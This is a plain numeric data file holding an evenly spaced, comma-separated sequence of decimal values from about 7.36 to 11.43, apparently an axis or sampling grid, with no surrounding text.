7.361, 7.362, 7.364, 7.365, 7.367, 7.368, 7.369, 7.371, 7.372, 7.374, 7.375, 7.376, 7.378, 7.379, 7.381, 7.382, 7.383, 7.385, 7.386, 7.388, 7.389, 7.39, 7.392, 7.393, 7.394, 7.396, 7.397, 7.399, 7.4, 7.401, 7.403, 7.404, 7.406, 7.407, 7.408, 7.41, 7.411, 7.412, 7.414, 7.415, 7.417, 7.418, 7.419, 7.421, 7.422, 7.424, 7.425, 7.426, 7.428, 7.429, 7.431, 7.432, 7.433, 7.435, 7.436, 7.438, 7.439, 7.44, 7.442, 7.443, 7.444, 7.446, 7.447, 7.449, 7.45, 7.451, 7.453, 7.454, 7.456, 7.457, 7.458, 7.46, 7.461, 7.463, 7.464, 7.465, 7.467, 7.468, 7.469, 7.471, 7.472, 7.474, 7.475, 7.476, 7.478, 7.479, 7.481, 7.482, 7.483, 7.485, 7.486, 7.487, 7.489, 7.49, 7.492, 7.493, 7.494, 7.496, 7.497, 7.499, 7.5, 7.501, 7.503, 7.504, 7.506, 7.507, 7.508, 7.51, 7.511, 7.513, 7.514, 7.515, 7.517, 7.518, 7.519, 7.521, 7.522, 7.524, 7.525, 7.526, 7.528, 7.529, 7.531, 7.532, 7.533, 7.535, 7.536, 7.537, 7.539, 7.54, 7.542, 7.543, 7.544, 7.546, 7.547, 7.549, 7.55, 7.551, 7.553, 7.554, 7.556, 7.557, 7.558, 7.56, 7.561, 7.562, 7.564, 7.565, 7.567, 7.568, 7.569, 7.571, 7.572, 7.574, 7.575, 7.576, 7.578, 7.579, 7.581, 7.582, 7.583, 7.585, 7.586, 7.588, 7.589, 7.59, 7.592, 7.593, 7.594, 7.596, 7.597, 7.599, 7.6, 7.601, 7.603, 7.604, 7.606, 7.607, 7.608, 7.61, 7.611, 7.612, 7.614, 7.615, 7.617, 7.618, 7.619, 
7.621, 7.622, 7.624, 7.625, 7.626, 7.628, 7.629, 7.631, 7.632, 7.633, 7.635, 7.636, 7.638, 7.639, 7.64, 7.642, 7.643, 7.644, 7.646, 7.647, 7.649, 7.65, 7.651, 7.653, 7.654, 7.656, 7.657, 7.658, 7.66, 7.661, 7.662, 7.664, 7.665, 7.667, 7.668, 7.669, 7.671, 7.672, 7.674, 7.675, 7.676, 7.678, 7.679, 7.681, 7.682, 7.683, 7.685, 7.686, 7.688, 7.689, 7.69, 7.692, 7.693, 7.694, 7.696, 7.697, 7.699, 7.7, 7.701, 7.703, 7.704, 7.706, 7.707, 7.708, 7.71, 7.711, 7.713, 7.714, 7.715, 7.717, 7.718, 7.719, 7.721, 7.722, 7.724, 7.725, 7.726, 7.728, 7.729, 7.731, 7.732, 7.733, 7.735, 7.736, 7.737, 7.739, 7.74, 7.742, 7.743, 7.744, 7.746, 7.747, 7.749, 7.75, 7.751, 7.753, 7.754, 7.756, 7.757, 7.758, 7.76, 7.761, 7.763, 7.764, 7.765, 7.767, 7.768, 7.769, 7.771, 7.772, 7.774, 7.775, 7.776, 7.778, 7.779, 7.781, 7.782, 7.783, 7.785, 7.786, 7.787, 7.789, 7.79, 7.792, 7.793, 7.794, 7.796, 7.797, 7.799, 7.8, 7.801, 7.803, 7.804, 7.806, 7.807, 7.808, 7.81, 7.811, 7.812, 7.814, 7.815, 7.817, 7.818, 7.819, 7.821, 7.822, 7.824, 7.825, 7.826, 7.828, 7.829, 7.831, 7.832, 7.833, 7.835, 7.836, 7.838, 7.839, 7.84, 7.842, 7.843, 7.844, 7.846, 7.847, 7.849, 7.85, 7.851, 7.853, 7.854, 7.856, 7.857, 7.858, 7.86, 7.861, 7.862, 7.864, 7.865, 7.867, 7.868, 7.869, 7.871, 7.872, 7.874, 7.875, 7.876, 7.878, 7.879, 7.881, 7.882, 7.883, 7.885, 7.886, 7.888, 7.889, 7.89, 7.892, 7.893, 7.894, 7.896, 7.897, 7.899, 7.9, 7.901, 7.903, 7.904, 7.906, 7.907, 7.908, 7.91, 7.911, 7.912, 7.914, 7.915, 7.917, 7.918, 7.919, 7.921, 7.922, 7.924, 7.925, 7.926, 7.928, 7.929, 7.931, 7.932, 7.933, 7.935, 7.936, 7.938, 7.939, 7.94, 7.942, 7.943, 7.944, 7.946, 7.947, 7.949, 7.95, 7.951, 7.953, 7.954, 7.956, 7.957, 7.958, 7.96, 7.961, 7.963, 7.964, 7.965, 7.967, 7.968, 7.969, 7.971, 7.972, 7.974, 7.975, 7.976, 7.978, 7.979, 7.981, 7.982, 7.983, 7.985, 7.986, 7.987, 7.989, 7.99, 7.992, 7.993, 7.994, 7.996, 7.997, 7.999, 8.0, 8.001, 8.003, 8.004, 8.006, 8.007, 8.008, 8.01, 8.011, 8.012, 8.014, 8.015, 8.017, 8.018, 8.019, 8.021, 
8.022, 8.024, 8.025, 8.026, 8.028, 8.029, 8.031, 8.032, 8.033, 8.035, 8.036, 8.037, 8.039, 8.04, 8.042, 8.043, 8.044, 8.046, 8.047, 8.049, 8.05, 8.051, 8.053, 8.054, 8.056, 8.057, 8.058, 8.06, 8.061, 8.062, 8.064, 8.065, 8.067, 8.068, 8.069, 8.071, 8.072, 8.074, 8.075, 8.076, 8.078, 8.079, 8.081, 8.082, 8.083, 8.085, 8.086, 8.088, 8.089, 8.09, 8.092, 8.093, 8.094, 8.096, 8.097, 8.099, 8.1, 8.101, 8.103, 8.104, 8.106, 8.107, 8.108, 8.11, 8.111, 8.113, 8.114, 8.115, 8.117, 8.118, 8.119, 8.121, 8.122, 8.124, 8.125, 8.126, 8.128, 8.129, 8.131, 8.132, 8.133, 8.135, 8.136, 8.137, 8.139, 8.14, 8.142, 8.143, 8.144, 8.146, 8.147, 8.149, 8.15, 8.151, 8.153, 8.154, 8.156, 8.157, 8.158, 8.16, 8.161, 8.162, 8.164, 8.165, 8.167, 8.168, 8.169, 8.171, 8.172, 8.174, 8.175, 8.176, 8.178, 8.179, 8.181, 8.182, 8.183, 8.185, 8.186, 8.188, 8.189, 8.19, 8.192, 8.193, 8.194, 8.196, 8.197, 8.199, 8.2, 8.201, 8.203, 8.204, 8.206, 8.207, 8.208, 8.21, 8.211, 8.213, 8.214, 8.215, 8.217, 8.218, 8.219, 8.221, 8.222, 8.224, 8.225, 8.226, 8.228, 8.229, 8.231, 8.232, 8.233, 8.235, 8.236, 8.238, 8.239, 8.24, 8.242, 8.243, 8.244, 8.246, 8.247, 8.249, 8.25, 8.251, 8.253, 8.254, 8.256, 8.257, 8.258, 8.26, 8.261, 8.262, 8.264, 8.265, 8.267, 8.268, 8.269, 8.271, 8.272, 8.274, 8.275, 8.276, 8.278, 8.279, 8.281, 8.282, 8.283, 8.285, 8.286, 8.287, 8.289, 8.29, 8.292, 8.293, 8.294, 8.296, 8.297, 8.299, 8.3, 8.301, 8.303, 8.304, 8.306, 8.307, 8.308, 8.31, 8.311, 8.312, 8.314, 8.315, 8.317, 8.318, 8.319, 8.321, 8.322, 8.324, 8.325, 8.326, 8.328, 8.329, 8.331, 8.332, 8.333, 8.335, 8.336, 8.338, 8.339, 8.34, 8.342, 8.343, 8.344, 8.346, 8.347, 8.349, 8.35, 8.351, 8.353, 8.354, 8.356, 8.357, 8.358, 8.36, 8.361, 8.363, 8.364, 8.365, 8.367, 8.368, 8.369, 8.371, 8.372, 8.374, 8.375, 8.376, 8.378, 8.379, 8.381, 8.382, 8.383, 8.385, 8.386, 8.387, 8.389, 8.39, 8.392, 8.393, 8.394, 8.396, 8.397, 8.399, 8.4, 8.401, 8.403, 8.404, 8.406, 8.407, 8.408, 8.41, 8.411, 8.412, 8.414, 8.415, 8.417, 8.418, 8.419, 8.421, 8.422, 
8.424, 8.425, 8.426, 8.428, 8.429, 8.431, 8.432, 8.433, 8.435, 8.436, 8.438, 8.439, 8.44, 8.442, 8.443, 8.444, 8.446, 8.447, 8.449, 8.45, 8.451, 8.453, 8.454, 8.456, 8.457, 8.458, 8.46, 8.461, 8.463, 8.464, 8.465, 8.467, 8.468, 8.469, 8.471, 8.472, 8.474, 8.475, 8.476, 8.478, 8.479, 8.481, 8.482, 8.483, 8.485, 8.486, 8.488, 8.489, 8.49, 8.492, 8.493, 8.494, 8.496, 8.497, 8.499, 8.5, 8.501, 8.503, 8.504, 8.506, 8.507, 8.508, 8.51, 8.511, 8.512, 8.514, 8.515, 8.517, 8.518, 8.519, 8.521, 8.522, 8.524, 8.525, 8.526, 8.528, 8.529, 8.531, 8.532, 8.533, 8.535, 8.536, 8.537, 8.539, 8.54, 8.542, 8.543, 8.544, 8.546, 8.547, 8.549, 8.55, 8.551, 8.553, 8.554, 8.556, 8.557, 8.558, 8.56, 8.561, 8.562, 8.564, 8.565, 8.567, 8.568, 8.569, 8.571, 8.572, 8.574, 8.575, 8.576, 8.578, 8.579, 8.581, 8.582, 8.583, 8.585, 8.586, 8.588, 8.589, 8.59, 8.592, 8.593, 8.594, 8.596, 8.597, 8.599, 8.6, 8.601, 8.603, 8.604, 8.606, 8.607, 8.608, 8.61, 8.611, 8.613, 8.614, 8.615, 8.617, 8.618, 8.619, 8.621, 8.622, 8.624, 8.625, 8.626, 8.628, 8.629, 8.631, 8.632, 8.633, 8.635, 8.636, 8.637, 8.639, 8.64, 8.642, 8.643, 8.644, 8.646, 8.647, 8.649, 8.65, 8.651, 8.653, 8.654, 8.656, 8.657, 8.658, 8.66, 8.661, 8.662, 8.664, 8.665, 8.667, 8.668, 8.669, 8.671, 8.672, 8.674, 8.675, 8.676, 8.678, 8.679, 8.681, 8.682, 8.683, 8.685, 8.686, 8.688, 8.689, 8.69, 8.692, 8.693, 8.694, 8.696, 8.697, 8.699, 8.7, 8.701, 8.703, 8.704, 8.706, 8.707, 8.708, 8.71, 8.711, 8.713, 8.714, 8.715, 8.717, 8.718, 8.719, 8.721, 8.722, 8.724, 8.725, 8.726, 8.728, 8.729, 8.731, 8.732, 8.733, 8.735, 8.736, 8.738, 8.739, 8.74, 8.742, 8.743, 8.744, 8.746, 8.747, 8.749, 8.75, 8.751, 8.753, 8.754, 8.756, 8.757, 8.758, 8.76, 8.761, 8.762, 8.764, 8.765, 8.767, 8.768, 8.769, 8.771, 8.772, 8.774, 8.775, 8.776, 8.778, 8.779, 8.781, 8.782, 8.783, 8.785, 8.786, 8.787, 8.789, 8.79, 8.792, 8.793, 8.794, 8.796, 8.797, 8.799, 8.8, 8.801, 8.803, 8.804, 8.806, 8.807, 8.808, 8.81, 8.811, 8.812, 8.814, 8.815, 8.817, 8.818, 8.819, 8.821, 8.822, 8.824, 
8.825, 8.826, 8.828, 8.829, 8.831, 8.832, 8.833, 8.835, 8.836, 8.838, 8.839, 8.84, 8.842, 8.843, 8.844, 8.846, 8.847, 8.849, 8.85, 8.851, 8.853, 8.854, 8.856, 8.857, 8.858, 8.86, 8.861, 8.863, 8.864, 8.865, 8.867, 8.868, 8.869, 8.871, 8.872, 8.874, 8.875, 8.876, 8.878, 8.879, 8.881, 8.882, 8.883, 8.885, 8.886, 8.887, 8.889, 8.89, 8.892, 8.893, 8.894, 8.896, 8.897, 8.899, 8.9, 8.901, 8.903, 8.904, 8.906, 8.907, 8.908, 8.91, 8.911, 8.912, 8.914, 8.915, 8.917, 8.918, 8.919, 8.921, 8.922, 8.924, 8.925, 8.926, 8.928, 8.929, 8.931, 8.932, 8.933, 8.935, 8.936, 8.938, 8.939, 8.94, 8.942, 8.943, 8.944, 8.946, 8.947, 8.949, 8.95, 8.951, 8.953, 8.954, 8.956, 8.957, 8.958, 8.96, 8.961, 8.963, 8.964, 8.965, 8.967, 8.968, 8.969, 8.971, 8.972, 8.974, 8.975, 8.976, 8.978, 8.979, 8.981, 8.982, 8.983, 8.985, 8.986, 8.988, 8.989, 8.99, 8.992, 8.993, 8.994, 8.996, 8.997, 8.999, 9.0, 9.001, 9.003, 9.004, 9.006, 9.007, 9.008, 9.01, 9.011, 9.012, 9.014, 9.015, 9.017, 9.018, 9.019, 9.021, 9.022, 9.024, 9.025, 9.026, 9.028, 9.029, 9.031, 9.032, 9.033, 9.035, 9.036, 9.037, 9.039, 9.04, 9.042, 9.043, 9.044, 9.046, 9.047, 9.049, 9.05, 9.051, 9.053, 9.054, 9.056, 9.057, 9.058, 9.06, 9.061, 9.062, 9.064, 9.065, 9.067, 9.068, 9.069, 9.071, 9.072, 9.074, 9.075, 9.076, 9.078, 9.079, 9.081, 9.082, 9.083, 9.085, 9.086, 9.088, 9.089, 9.09, 9.092, 9.093, 9.094, 9.096, 9.097, 9.099, 9.1, 9.101, 9.103, 9.104, 9.106, 9.107, 9.108, 9.11, 9.111, 9.113, 9.114, 9.115, 9.117, 9.118, 9.119, 9.121, 9.122, 9.124, 9.125, 9.126, 9.128, 9.129, 9.131, 9.132, 9.133, 9.135, 9.136, 9.137, 9.139, 9.14, 9.142, 9.143, 9.144, 9.146, 9.147, 9.149, 9.15, 9.151, 9.153, 9.154, 9.156, 9.157, 9.158, 9.16, 9.161, 9.162, 9.164, 9.165, 9.167, 9.168, 9.169, 9.171, 9.172, 9.174, 9.175, 9.176, 9.178, 9.179, 9.181, 9.182, 9.183, 9.185, 9.186, 9.188, 9.189, 9.19, 9.192, 9.193, 9.194, 9.196, 9.197, 9.199, 9.2, 9.201, 9.203, 9.204, 9.206, 9.207, 9.208, 9.21, 9.211, 9.213, 9.214, 9.215, 9.217, 9.218, 9.219, 9.221, 9.222, 9.224, 9.225, 
9.226, 9.228, 9.229, 9.231, 9.232, 9.233, 9.235, 9.236, 9.238, 9.239, 9.24, 9.242, 9.243, 9.244, 9.246, 9.247, 9.249, 9.25, 9.251, 9.253, 9.254, 9.256, 9.257, 9.258, 9.26, 9.261, 9.262, 9.264, 9.265, 9.267, 9.268, 9.269, 9.271, 9.272, 9.274, 9.275, 9.276, 9.278, 9.279, 9.281, 9.282, 9.283, 9.285, 9.286, 9.287, 9.289, 9.29, 9.292, 9.293, 9.294, 9.296, 9.297, 9.299, 9.3, 9.301, 9.303, 9.304, 9.306, 9.307, 9.308, 9.31, 9.311, 9.312, 9.314, 9.315, 9.317, 9.318, 9.319, 9.321, 9.322, 9.324, 9.325, 9.326, 9.328, 9.329, 9.331, 9.332, 9.333, 9.335, 9.336, 9.338, 9.339, 9.34, 9.342, 9.343, 9.344, 9.346, 9.347, 9.349, 9.35, 9.351, 9.353, 9.354, 9.356, 9.357, 9.358, 9.36, 9.361, 9.363, 9.364, 9.365, 9.367, 9.368, 9.369, 9.371, 9.372, 9.374, 9.375, 9.376, 9.378, 9.379, 9.381, 9.382, 9.383, 9.385, 9.386, 9.387, 9.389, 9.39, 9.392, 9.393, 9.394, 9.396, 9.397, 9.399, 9.4, 9.401, 9.403, 9.404, 9.406, 9.407, 9.408, 9.41, 9.411, 9.412, 9.414, 9.415, 9.417, 9.418, 9.419, 9.421, 9.422, 9.424, 9.425, 9.426, 9.428, 9.429, 9.431, 9.432, 9.433, 9.435, 9.436, 9.438, 9.439, 9.44, 9.442, 9.443, 9.444, 9.446, 9.447, 9.449, 9.45, 9.451, 9.453, 9.454, 9.456, 9.457, 9.458, 9.46, 9.461, 9.463, 9.464, 9.465, 9.467, 9.468, 9.469, 9.471, 9.472, 9.474, 9.475, 9.476, 9.478, 9.479, 9.481, 9.482, 9.483, 9.485, 9.486, 9.488, 9.489, 9.49, 9.492, 9.493, 9.494, 9.496, 9.497, 9.499, 9.5, 9.501, 9.503, 9.504, 9.506, 9.507, 9.508, 9.51, 9.511, 9.512, 9.514, 9.515, 9.517, 9.518, 9.519, 9.521, 9.522, 9.524, 9.525, 9.526, 9.528, 9.529, 9.531, 9.532, 9.533, 9.535, 9.536, 9.537, 9.539, 9.54, 9.542, 9.543, 9.544, 9.546, 9.547, 9.549, 9.55, 9.551, 9.553, 9.554, 9.556, 9.557, 9.558, 9.56, 9.561, 9.562, 9.564, 9.565, 9.567, 9.568, 9.569, 9.571, 9.572, 9.574, 9.575, 9.576, 9.578, 9.579, 9.581, 9.582, 9.583, 9.585, 9.586, 9.588, 9.589, 9.59, 9.592, 9.593, 9.594, 9.596, 9.597, 9.599, 9.6, 9.601, 9.603, 9.604, 9.606, 9.607, 9.608, 9.61, 9.611, 9.613, 9.614, 9.615, 9.617, 9.618, 9.619, 9.621, 9.622, 9.624, 9.625, 9.626, 
9.628, 9.629, 9.631, 9.632, 9.633, 9.635, 9.636, 9.637, 9.639, 9.64, 9.642, 9.643, 9.644, 9.646, 9.647, 9.649, 9.65, 9.651, 9.653, 9.654, 9.656, 9.657, 9.658, 9.66, 9.661, 9.662, 9.664, 9.665, 9.667, 9.668, 9.669, 9.671, 9.672, 9.674, 9.675, 9.676, 9.678, 9.679, 9.681, 9.682, 9.683, 9.685, 9.686, 9.688, 9.689, 9.69, 9.692, 9.693, 9.694, 9.696, 9.697, 9.699, 9.7, 9.701, 9.703, 9.704, 9.706, 9.707, 9.708, 9.71, 9.711, 9.713, 9.714, 9.715, 9.717, 9.718, 9.719, 9.721, 9.722, 9.724, 9.725, 9.726, 9.728, 9.729, 9.731, 9.732, 9.733, 9.735, 9.736, 9.738, 9.739, 9.74, 9.742, 9.743, 9.744, 9.746, 9.747, 9.749, 9.75, 9.751, 9.753, 9.754, 9.756, 9.757, 9.758, 9.76, 9.761, 9.762, 9.764, 9.765, 9.767, 9.768, 9.769, 9.771, 9.772, 9.774, 9.775, 9.776, 9.778, 9.779, 9.781, 9.782, 9.783, 9.785, 9.786, 9.787, 9.789, 9.79, 9.792, 9.793, 9.794, 9.796, 9.797, 9.799, 9.8, 9.801, 9.803, 9.804, 9.806, 9.807, 9.808, 9.81, 9.811, 9.812, 9.814, 9.815, 9.817, 9.818, 9.819, 9.821, 9.822, 9.824, 9.825, 9.826, 9.828, 9.829, 9.831, 9.832, 9.833, 9.835, 9.836, 9.838, 9.839, 9.84, 9.842, 9.843, 9.844, 9.846, 9.847, 9.849, 9.85, 9.851, 9.853, 9.854, 9.856, 9.857, 9.858, 9.86, 9.861, 9.863, 9.864, 9.865, 9.867, 9.868, 9.869, 9.871, 9.872, 9.874, 9.875, 9.876, 9.878, 9.879, 9.881, 9.882, 9.883, 9.885, 9.886, 9.887, 9.889, 9.89, 9.892, 9.893, 9.894, 9.896, 9.897, 9.899, 9.9, 9.901, 9.903, 9.904, 9.906, 9.907, 9.908, 9.91, 9.911, 9.912, 9.914, 9.915, 9.917, 9.918, 9.919, 9.921, 9.922, 9.924, 9.925, 9.926, 9.928, 9.929, 9.931, 9.932, 9.933, 9.935, 9.936, 9.938, 9.939, 9.94, 9.942, 9.943, 9.944, 9.946, 9.947, 9.949, 9.95, 9.951, 9.953, 9.954, 9.956, 9.957, 9.958, 9.96, 9.961, 9.963, 9.964, 9.965, 9.967, 9.968, 9.969, 9.971, 9.972, 9.974, 9.975, 9.976, 9.978, 9.979, 9.981, 9.982, 9.983, 9.985, 9.986, 9.988, 9.989, 9.99, 9.992, 9.993, 9.994, 9.996, 9.997, 9.999, 10.0, 10.001, 10.003, 10.004, 10.006, 10.007, 10.008, 10.01, 10.011, 10.012, 10.014, 10.015, 10.017, 10.018, 10.019, 10.021, 10.022, 10.024, 10.025, 
10.026, 10.028, 10.029, 10.031, 10.032, 10.033, 10.035, 10.036, 10.037, 10.039, 10.04, 10.042, 10.043, 10.044, 10.046, 10.047, 10.049, 10.05, 10.051, 10.053, 10.054, 10.056, 10.057, 10.058, 10.06, 10.061, 10.062, 10.064, 10.065, 10.067, 10.068, 10.069, 10.071, 10.072, 10.074, 10.075, 10.076, 10.078, 10.079, 10.081, 10.082, 10.083, 10.085, 10.086, 10.088, 10.089, 10.09, 10.092, 10.093, 10.094, 10.096, 10.097, 10.099, 10.1, 10.101, 10.103, 10.104, 10.106, 10.107, 10.108, 10.11, 10.111, 10.113, 10.114, 10.115, 10.117, 10.118, 10.119, 10.121, 10.122, 10.124, 10.125, 10.126, 10.128, 10.129, 10.131, 10.132, 10.133, 10.135, 10.136, 10.137, 10.139, 10.14, 10.142, 10.143, 10.144, 10.146, 10.147, 10.149, 10.15, 10.151, 10.153, 10.154, 10.156, 10.157, 10.158, 10.16, 10.161, 10.162, 10.164, 10.165, 10.167, 10.168, 10.169, 10.171, 10.172, 10.174, 10.175, 10.176, 10.178, 10.179, 10.181, 10.182, 10.183, 10.185, 10.186, 10.188, 10.189, 10.19, 10.192, 10.193, 10.194, 10.196, 10.197, 10.199, 10.2, 10.201, 10.203, 10.204, 10.206, 10.207, 10.208, 10.21, 10.211, 10.213, 10.214, 10.215, 10.217, 10.218, 10.219, 10.221, 10.222, 10.224, 10.225, 10.226, 10.228, 10.229, 10.231, 10.232, 10.233, 10.235, 10.236, 10.238, 10.239, 10.24, 10.242, 10.243, 10.244, 10.246, 10.247, 10.249, 10.25, 10.251, 10.253, 10.254, 10.256, 10.257, 10.258, 10.26, 10.261, 10.262, 10.264, 10.265, 10.267, 10.268, 10.269, 10.271, 10.272, 10.274, 10.275, 10.276, 10.278, 10.279, 10.281, 10.282, 10.283, 10.285, 10.286, 10.287, 10.289, 10.29, 10.292, 10.293, 10.294, 10.296, 10.297, 10.299, 10.3, 10.301, 10.303, 10.304, 10.306, 10.307, 10.308, 10.31, 10.311, 10.312, 10.314, 10.315, 10.317, 10.318, 10.319, 10.321, 10.322, 10.324, 10.325, 10.326, 10.328, 10.329, 10.331, 10.332, 10.333, 10.335, 10.336, 10.338, 10.339, 10.34, 10.342, 10.343, 10.344, 10.346, 10.347, 10.349, 10.35, 10.351, 10.353, 10.354, 10.356, 10.357, 10.358, 10.36, 10.361, 10.363, 10.364, 10.365, 10.367, 10.368, 10.369, 10.371, 10.372, 10.374, 10.375, 10.376, 
10.378, 10.379, 10.381, 10.382, 10.383, 10.385, 10.386, 10.387, 10.389, 10.39, 10.392, 10.393, 10.394, 10.396, 10.397, 10.399, 10.4, 10.401, 10.403, 10.404, 10.406, 10.407, 10.408, 10.41, 10.411, 10.412, 10.414, 10.415, 10.417, 10.418, 10.419, 10.421, 10.422, 10.424, 10.425, 10.426, 10.428, 10.429, 10.431, 10.432, 10.433, 10.435, 10.436, 10.438, 10.439, 10.44, 10.442, 10.443, 10.444, 10.446, 10.447, 10.449, 10.45, 10.451, 10.453, 10.454, 10.456, 10.457, 10.458, 10.46, 10.461, 10.463, 10.464, 10.465, 10.467, 10.468, 10.469, 10.471, 10.472, 10.474, 10.475, 10.476, 10.478, 10.479, 10.481, 10.482, 10.483, 10.485, 10.486, 10.488, 10.489, 10.49, 10.492, 10.493, 10.494, 10.496, 10.497, 10.499, 10.5, 10.501, 10.503, 10.504, 10.506, 10.507, 10.508, 10.51, 10.511, 10.512, 10.514, 10.515, 10.517, 10.518, 10.519, 10.521, 10.522, 10.524, 10.525, 10.526, 10.528, 10.529, 10.531, 10.532, 10.533, 10.535, 10.536, 10.537, 10.539, 10.54, 10.542, 10.543, 10.544, 10.546, 10.547, 10.549, 10.55, 10.551, 10.553, 10.554, 10.556, 10.557, 10.558, 10.56, 10.561, 10.562, 10.564, 10.565, 10.567, 10.568, 10.569, 10.571, 10.572, 10.574, 10.575, 10.576, 10.578, 10.579, 10.581, 10.582, 10.583, 10.585, 10.586, 10.588, 10.589, 10.59, 10.592, 10.593, 10.594, 10.596, 10.597, 10.599, 10.6, 10.601, 10.603, 10.604, 10.606, 10.607, 10.608, 10.61, 10.611, 10.613, 10.614, 10.615, 10.617, 10.618, 10.619, 10.621, 10.622, 10.624, 10.625, 10.626, 10.628, 10.629, 10.631, 10.632, 10.633, 10.635, 10.636, 10.637, 10.639, 10.64, 10.642, 10.643, 10.644, 10.646, 10.647, 10.649, 10.65, 10.651, 10.653, 10.654, 10.656, 10.657, 10.658, 10.66, 10.661, 10.662, 10.664, 10.665, 10.667, 10.668, 10.669, 10.671, 10.672, 10.674, 10.675, 10.676, 10.678, 10.679, 10.681, 10.682, 10.683, 10.685, 10.686, 10.688, 10.689, 10.69, 10.692, 10.693, 10.694, 10.696, 10.697, 10.699, 10.7, 10.701, 10.703, 10.704, 10.706, 10.707, 10.708, 10.71, 10.711, 10.713, 10.714, 10.715, 10.717, 10.718, 10.719, 10.721, 10.722, 10.724, 10.725, 10.726, 10.728, 
10.729, 10.731, 10.732, 10.733, 10.735, 10.736, 10.738, 10.739, 10.74, 10.742, 10.743, 10.744, 10.746, 10.747, 10.749, 10.75, 10.751, 10.753, 10.754, 10.756, 10.757, 10.758, 10.76, 10.761, 10.762, 10.764, 10.765, 10.767, 10.768, 10.769, 10.771, 10.772, 10.774, 10.775, 10.776, 10.778, 10.779, 10.781, 10.782, 10.783, 10.785, 10.786, 10.787, 10.789, 10.79, 10.792, 10.793, 10.794, 10.796, 10.797, 10.799, 10.8, 10.801, 10.803, 10.804, 10.806, 10.807, 10.808, 10.81, 10.811, 10.812, 10.814, 10.815, 10.817, 10.818, 10.819, 10.821, 10.822, 10.824, 10.825, 10.826, 10.828, 10.829, 10.831, 10.832, 10.833, 10.835, 10.836, 10.838, 10.839, 10.84, 10.842, 10.843, 10.844, 10.846, 10.847, 10.849, 10.85, 10.851, 10.853, 10.854, 10.856, 10.857, 10.858, 10.86, 10.861, 10.863, 10.864, 10.865, 10.867, 10.868, 10.869, 10.871, 10.872, 10.874, 10.875, 10.876, 10.878, 10.879, 10.881, 10.882, 10.883, 10.885, 10.886, 10.887, 10.889, 10.89, 10.892, 10.893, 10.894, 10.896, 10.897, 10.899, 10.9, 10.901, 10.903, 10.904, 10.906, 10.907, 10.908, 10.91, 10.911, 10.912, 10.914, 10.915, 10.917, 10.918, 10.919, 10.921, 10.922, 10.924, 10.925, 10.926, 10.928, 10.929, 10.931, 10.932, 10.933, 10.935, 10.936, 10.938, 10.939, 10.94, 10.942, 10.943, 10.944, 10.946, 10.947, 10.949, 10.95, 10.951, 10.953, 10.954, 10.956, 10.957, 10.958, 10.96, 10.961, 10.963, 10.964, 10.965, 10.967, 10.968, 10.969, 10.971, 10.972, 10.974, 10.975, 10.976, 10.978, 10.979, 10.981, 10.982, 10.983, 10.985, 10.986, 10.988, 10.989, 10.99, 10.992, 10.993, 10.994, 10.996, 10.997, 10.999, 11.0, 11.001, 11.003, 11.004, 11.006, 11.007, 11.008, 11.01, 11.011, 11.012, 11.014, 11.015, 11.017, 11.018, 11.019, 11.021, 11.022, 11.024, 11.025, 11.026, 11.028, 11.029, 11.031, 11.032, 11.033, 11.035, 11.036, 11.037, 11.039, 11.04, 11.042, 11.043, 11.044, 11.046, 11.047, 11.049, 11.05, 11.051, 11.053, 11.054, 11.056, 11.057, 11.058, 11.06, 11.061, 11.062, 11.064, 11.065, 11.067, 11.068, 11.069, 11.071, 11.072, 11.074, 11.075, 11.076, 11.078, 11.079, 
11.081, 11.082, 11.083, 11.085, 11.086, 11.088, 11.089, 11.09, 11.092, 11.093, 11.094, 11.096, 11.097, 11.099, 11.1, 11.101, 11.103, 11.104, 11.106, 11.107, 11.108, 11.11, 11.111, 11.113, 11.114, 11.115, 11.117, 11.118, 11.119, 11.121, 11.122, 11.124, 11.125, 11.126, 11.128, 11.129, 11.131, 11.132, 11.133, 11.135, 11.136, 11.137, 11.139, 11.14, 11.142, 11.143, 11.144, 11.146, 11.147, 11.149, 11.15, 11.151, 11.153, 11.154, 11.156, 11.157, 11.158, 11.16, 11.161, 11.162, 11.164, 11.165, 11.167, 11.168, 11.169, 11.171, 11.172, 11.174, 11.175, 11.176, 11.178, 11.179, 11.181, 11.182, 11.183, 11.185, 11.186, 11.188, 11.189, 11.19, 11.192, 11.193, 11.194, 11.196, 11.197, 11.199, 11.2, 11.201, 11.203, 11.204, 11.206, 11.207, 11.208, 11.21, 11.211, 11.213, 11.214, 11.215, 11.217, 11.218, 11.219, 11.221, 11.222, 11.224, 11.225, 11.226, 11.228, 11.229, 11.231, 11.232, 11.233, 11.235, 11.236, 11.238, 11.239, 11.24, 11.242, 11.243, 11.244, 11.246, 11.247, 11.249, 11.25, 11.251, 11.253, 11.254, 11.256, 11.257, 11.258, 11.26, 11.261, 11.262, 11.264, 11.265, 11.267, 11.268, 11.269, 11.271, 11.272, 11.274, 11.275, 11.276, 11.278, 11.279, 11.281, 11.282, 11.283, 11.285, 11.286, 11.287, 11.289, 11.29, 11.292, 11.293, 11.294, 11.296, 11.297, 11.299, 11.3, 11.301, 11.303, 11.304, 11.306, 11.307, 11.308, 11.31, 11.311, 11.312, 11.314, 11.315, 11.317, 11.318, 11.319, 11.321, 11.322, 11.324, 11.325, 11.326, 11.328, 11.329, 11.331, 11.332, 11.333, 11.335, 11.336, 11.338, 11.339, 11.34, 11.342, 11.343, 11.344, 11.346, 11.347, 11.349, 11.35, 11.351, 11.353, 11.354, 11.356, 11.357, 11.358, 11.36, 11.361, 11.363, 11.364, 11.365, 11.367, 11.368, 11.369, 11.371, 11.372, 11.374, 11.375, 11.376, 11.378, 11.379, 11.381, 11.382, 11.383, 11.385, 11.386, 11.387, 11.389, 11.39, 11.392, 11.393, 11.394, 11.396, 11.397, 11.399, 11.4, 11.401, 11.403, 11.404, 11.406, 11.407, 11.408, 11.41, 11.411, 11.412, 11.414, 11.415, 11.417, 11.418, 11.419, 11.421, 11.422, 11.424, 11.425, 11.426, 11.428, 11.429, 11.431, 
